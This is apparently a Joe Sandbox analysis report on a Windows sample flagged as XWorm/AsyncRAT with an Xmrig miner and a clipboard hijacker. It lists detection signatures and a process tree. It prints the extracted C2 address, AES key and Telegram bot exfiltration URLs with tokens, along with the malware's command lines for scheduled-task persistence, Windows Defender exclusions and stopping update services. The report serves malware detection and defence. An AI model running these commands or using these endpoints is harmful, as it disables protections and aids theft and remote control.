Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe
Analysis ID:1416943
MD5:c8d9593196962fa5d706a207c16674cd
SHA1:686a8e674e6615d5cd91f7b2cba0c755054b3f69
SHA256:a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d
Tags:AsyncRATexe
Infos:

Detection

Clipboard Hijacker, XWorm, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule binary from dotnet directory
Yara detected AntiVM3
Yara detected Clipboard Hijacker
Yara detected Telegram RAT
Yara detected UAC Bypass using CMSTP
Yara detected XWorm
Yara detected Xmrig cryptocurrency miner
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops PE files to the startup folder
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe (PID: 432 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe" MD5: C8D9593196962FA5D706A207C16674CD)
    • jsc.exe (PID: 3416 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)
      • spczxf.exe (PID: 2908 cmdline: "C:\Users\user\AppData\Local\Temp\spczxf.exe" MD5: D76027FE4CFD48C7F8999C796E50E731)
        • aspnet_wp.exe (PID: 1340 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe" MD5: 10072393B2116AF4483194F101923CA4)
          • conhost.exe (PID: 640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WerFault.exe (PID: 6744 cmdline: C:\Windows\system32\WerFault.exe -u -p 2908 -s 3156 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • ohvrxt.exe (PID: 1384 cmdline: "C:\Users\user\AppData\Local\Temp\ohvrxt.exe" MD5: D01B812C108576056594805B6E9E7064)
        • aspnet_wp.exe (PID: 5872 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe" MD5: 10072393B2116AF4483194F101923CA4)
        • aspnet_wp.exe (PID: 6388 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe" MD5: 10072393B2116AF4483194F101923CA4)
        • WerFault.exe (PID: 5500 cmdline: C:\Windows\system32\WerFault.exe -u -p 1384 -s 1200 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • hgzxhw.exe (PID: 3660 cmdline: "C:\Users\user\AppData\Local\Temp\hgzxhw.exe" MD5: 3F3A51617811E9581ABA50376599EFA6)
        • RegAsm.exe (PID: 6120 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • MSBuild.exe (PID: 3260 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
          • cmd.exe (PID: 7020 cmdline: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 1532 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
            • PING.EXE (PID: 3776 cmdline: ping 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
            • schtasks.exe (PID: 4836 cmdline: schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • msbuild.exe (PID: 3960 cmdline: "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
              • conhost.exe (PID: 4424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • MSBuild.exe (PID: 3084 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • WerFault.exe (PID: 5964 cmdline: C:\Windows\system32\WerFault.exe -u -p 3660 -s 3136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • utntwb.exe (PID: 5788 cmdline: "C:\Users\user\AppData\Local\Temp\utntwb.exe" MD5: 86E00D529B3B454A84B942AC916211E3)
        • wmplayer.exe (PID: 1204 cmdline: "C:\Program Files\Windows Media Player\wmplayer.exe" MD5: 89DCD2D4C0EC638AADC00D3530E07E1D)
          • powershell.exe (PID: 5684 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 5172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 5076 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • cmd.exe (PID: 6352 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 1624 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 1568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wmplayer.exe (PID: 6452 cmdline: "C:\Program Files\Windows Media Player\wmplayer.exe" MD5: 89DCD2D4C0EC638AADC00D3530E07E1D)
        • WerFault.exe (PID: 5432 cmdline: C:\Windows\system32\WerFault.exe -u -p 5788 -s 3120 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 420 cmdline: C:\Windows\system32\WerFault.exe -u -p 432 -s 1216 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 6968 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5380 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 576 cmdline: C:\Windows\system32\WerFault.exe -pss -s 384 -p 432 -ip 432 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 1476 cmdline: C:\Windows\system32\WerFault.exe -pss -s 544 -p 2908 -ip 2908 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 6408 cmdline: C:\Windows\system32\WerFault.exe -pss -s 496 -p 1384 -ip 1384 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 396 cmdline: C:\Windows\system32\WerFault.exe -pss -s 544 -p 3660 -ip 3660 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 5504 cmdline: C:\Windows\system32\WerFault.exe -pss -s 476 -p 5788 -ip 5788 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 6908 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Microsoft.exe (PID: 4536 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe" MD5: 10072393B2116AF4483194F101923CA4)
    • conhost.exe (PID: 5412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • msbuild.exe (PID: 2432 cmdline: C:\Users\user\AppData\Local\ServiceHub\msbuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • conhost.exe (PID: 3988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: Xworm

{"C2 url": ["104.194.9.116"], "Port": "7000", "Aes key": "<123456789>", "Install file": "USB.exe", "Telegram URL": "https://api.telegram.org/bot6330888131:AAE5ycZdHuNqV5SVYhHeCfRENn6GuCjwXjs/sendMessage?chat_id=1046049845"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6389892231:AAEdDUVYYFJmNDGihmXB4rLw0iSrrh-e2fE/sendMessage"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3905812861.000000000307B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000000.00000002.1666528793.0000016E9AC91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000000.00000002.1666528793.0000016E9AC91000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x1fac7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x1fb64:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x1fc79:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x1f939:$cnc4: POST / HTTP/1.1
      0000001B.00000002.2296563820.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000003.00000002.3891974556.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          Click to see the 25 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.jsc.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            3.2.jsc.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              3.2.jsc.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x7167:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x7204:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x7319:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x6fd9:$cnc4: POST / HTTP/1.1
              12.2.aspnet_wp.exe.400000.0.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
                0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  Click to see the 6 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe", CommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentProcessId: 3260, ParentProcessName: MSBuild.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe", ProcessId: 7020, ProcessName: cmd.exe
                  Sigma detected: Invoke-Obfuscation VAR+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe", CommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentProcessId: 3260, ParentProcessName: MSBuild.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe", ProcessId: 7020, ProcessName: cmd.exe
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Windows Media Player\wmplayer.exe", ParentImage: C:\Program Files\Windows Media Player\wmplayer.exe, ParentProcessId: 1204, ParentProcessName: wmplayer.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5684, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Windows Media Player\wmplayer.exe", ParentImage: C:\Program Files\Windows Media Player\wmplayer.exe, ParentProcessId: 1204, ParentProcessName: wmplayer.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5684, ProcessName: powershell.exe
                  Sigma detected: Startup Folder File Write
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe, ProcessId: 1340, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f , CommandLine: schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f , CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7020, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f , ProcessId: 4836, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Windows Media Player\wmplayer.exe", ParentImage: C:\Program Files\Windows Media Player\wmplayer.exe, ParentProcessId: 1204, ParentProcessName: wmplayer.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5684, ProcessName: powershell.exe
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6968, ProcessName: svchost.exe

                  Malware Analysis System Evasion

                  barindex
                  Sigma detected: Schedule binary from dotnet directory
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe", CommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentProcessId: 3260, ParentProcessName: MSBuild.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe", ProcessId: 7020, ProcessName: cmd.exe

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: 104.194.9.116Avira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 00000000.00000002.1666528793.0000016E9AC91000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["104.194.9.116"], "Port": "7000", "Aes key": "<123456789>", "Install file": "USB.exe", "Telegram URL": "https://api.telegram.org/bot6330888131:AAE5ycZdHuNqV5SVYhHeCfRENn6GuCjwXjs/sendMessage?chat_id=1046049845"}
                  Source: spczxf.exe.2908.8.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6389892231:AAEdDUVYYFJmNDGihmXB4rLw0iSrrh-e2fE/sendMessage"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeReversingLabs: Detection: 35%
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeVirustotal: Detection: 48%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeReversingLabs: Detection: 62%
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeVirustotal: Detection: 50%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeReversingLabs: Detection: 40%
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeVirustotal: Detection: 47%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeReversingLabs: Detection: 45%
                  Source: C:\Users\user\AppData\Local\Temp\utntwb.exeVirustotal: Detection: 31%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeReversingLabs: Detection: 44%
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeVirustotal: Detection: 48%Perma Link
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpackString decryptor: 104.194.9.116
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpackString decryptor: 7000
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpackString decryptor: <123456789>
